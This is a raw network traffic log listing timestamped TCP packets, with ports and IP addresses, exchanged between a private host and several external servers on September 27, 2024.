Sep 27, 2024 01:38:17.237921000 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.237934113 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.237951040 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.237957954 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.237968922 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.237979889 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.237987041 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.237998009 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238008022 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238024950 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238032103 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238032103 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238040924 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238044024 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238055944 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238066912 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238075972 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238081932 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238081932 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238092899 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238101959 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238106012 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238120079 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238130093 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238142014 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238151073 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238151073 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238151073 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238167048 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238198042 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238208055 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238218069 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238220930 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238256931 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238266945 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238276958 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238290071 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238290071 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238295078 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238308907 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238318920 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238320112 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238318920 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238354921 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238354921 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238414049 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238445997 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238457918 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238467932 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238493919 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238495111 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238512039 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238517046 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238528013 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238538980 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238548994 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238562107 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238580942 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238581896 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238598108 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238607883 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238607883 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238609076 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238620996 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238647938 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238657951 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238666058 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238666058 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238671064 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238682985 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238698959 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238709927 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238727093 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238734007 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238734007 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238738060 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238765001 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238765001 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238787889 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238837004 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238847971 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238857985 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238873959 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238883972 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238884926 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238897085 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.238928080 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238928080 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.238928080 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.239020109 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.239037037 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.239047050 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.239057064 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.239068031 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.239075899 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.239078999 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.239092112 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.239098072 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.239101887 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.239111900 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.239118099 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.239129066 CEST	80	49734	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.239159107 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.239159107 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.239159107 CEST	49734	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.303993940 CEST	49741	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:17.304065943 CEST	443	49741	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:17.304218054 CEST	49741	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:17.304528952 CEST	49741	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:17.304550886 CEST	443	49741	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:17.510864019 CEST	443	49740	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:17.510994911 CEST	443	49740	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:17.511051893 CEST	49740	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:17.512490988 CEST	49740	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:17.512511015 CEST	443	49740	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:17.512561083 CEST	49740	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:17.512567043 CEST	443	49740	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:17.529052019 CEST	49742	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:17.529103041 CEST	443	49742	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:17.529243946 CEST	49742	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:17.529745102 CEST	49742	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:17.529752970 CEST	443	49742	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:17.883763075 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.888552904 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.888816118 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.891561985 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:17.896327972 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:17.990649939 CEST	443	49741	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:17.990704060 CEST	49741	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:17.991153955 CEST	49741	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:17.991164923 CEST	443	49741	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:17.992829084 CEST	49741	443	192.168.2.7	5.75.211.162
Sep 27, 2024 01:38:17.992834091 CEST	443	49741	5.75.211.162	192.168.2.7
Sep 27, 2024 01:38:18.038316011 CEST	443	49742	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:18.038405895 CEST	49742	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:18.043582916 CEST	49742	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:18.043606043 CEST	443	49742	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:18.043862104 CEST	443	49742	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:18.045149088 CEST	49742	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:18.045198917 CEST	49742	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:18.045227051 CEST	443	49742	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:18.552809954 CEST	443	49742	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:18.553025007 CEST	443	49742	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:18.553092957 CEST	49742	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:18.553687096 CEST	49742	443	192.168.2.7	188.114.96.3
Sep 27, 2024 01:38:18.553704023 CEST	443	49742	188.114.96.3	192.168.2.7
Sep 27, 2024 01:38:18.571990013 CEST	49744	443	192.168.2.7	172.67.162.108
Sep 27, 2024 01:38:18.572030067 CEST	443	49744	172.67.162.108	192.168.2.7
Sep 27, 2024 01:38:18.572096109 CEST	49744	443	192.168.2.7	172.67.162.108
Sep 27, 2024 01:38:18.572639942 CEST	49744	443	192.168.2.7	172.67.162.108
Sep 27, 2024 01:38:18.572659969 CEST	443	49744	172.67.162.108	192.168.2.7
Sep 27, 2024 01:38:18.604265928 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.604288101 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.604299068 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.604309082 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.604326963 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.604340076 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.604351997 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.604362011 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.604366064 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.604372978 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.604383945 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.604393005 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.604414940 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.604429007 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.609252930 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.609265089 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.609277010 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.609308958 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.657915115 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.696779013 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.696795940 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.696808100 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.696820021 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.696841002 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.696872950 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.697038889 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.697050095 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.697061062 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.697073936 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.697082996 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.697087049 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.697104931 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.697928905 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.697941065 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.697952032 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.697978020 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.698002100 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.698283911 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.698293924 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.698312998 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.698323965 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.698333979 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.698334932 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.698365927 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.699199915 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.699212074 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.699222088 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.699234962 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.699244976 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.699256897 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.699295044 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.699984074 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.751682043 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.787151098 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.787170887 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.787233114 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.788995028 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.789017916 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.789041996 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.789076090 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.789088011 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.789091110 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.789124012 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.789333105 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.789370060 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.789381027 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.789427042 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.789432049 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.789438963 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.789449930 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.789477110 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.790064096 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.790088892 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.790100098 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.790107965 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.790134907 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.790134907 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.790148973 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.790164948 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.790175915 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.790185928 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.790198088 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.790222883 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.790874958 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.790904045 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.790914059 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.790944099 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.790966988 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.791239977 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.791251898 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.791266918 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.791276932 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.791286945 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.791290998 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.791299105 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.791311979 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.791321993 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.791323900 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.791342020 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.791378975 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.792144060 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.792155027 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.792166948 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.792193890 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.792203903 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.792213917 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.792223930 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.792234898 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.792239904 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.792268038 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.792288065 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.793159008 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.793178082 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.793497086 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.880652905 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.880678892 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.880691051 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.880702972 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.880712986 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.880723000 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.880733967 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.880767107 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.880875111 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.881355047 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881366968 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881443024 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881453037 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881463051 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881494999 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.881515026 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.881639004 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881649971 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881659985 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881690979 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.881865978 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881876945 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881882906 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881908894 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881920099 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881931067 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881932974 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.881942034 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881954908 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.881987095 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.882018089 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.882474899 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.882486105 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.882496119 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.882530928 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.882535934 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.882544994 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.882555962 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.882564068 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.882575989 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.882586002 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.882594109 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.882599115 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.882632971 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.882658958 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.883209944 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.883222103 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.883233070 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.883259058 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.883269072 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.883279085 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.883290052 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.883295059 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.883323908 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.883330107 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.883330107 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.883336067 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.883347034 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.883358955 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.883361101 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.883402109 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.884156942 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.884169102 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.884180069 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.884217024 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.884223938 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:18.884232998 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:18.884246111 CEST	80	49743	147.45.44.104	192.168.2.7
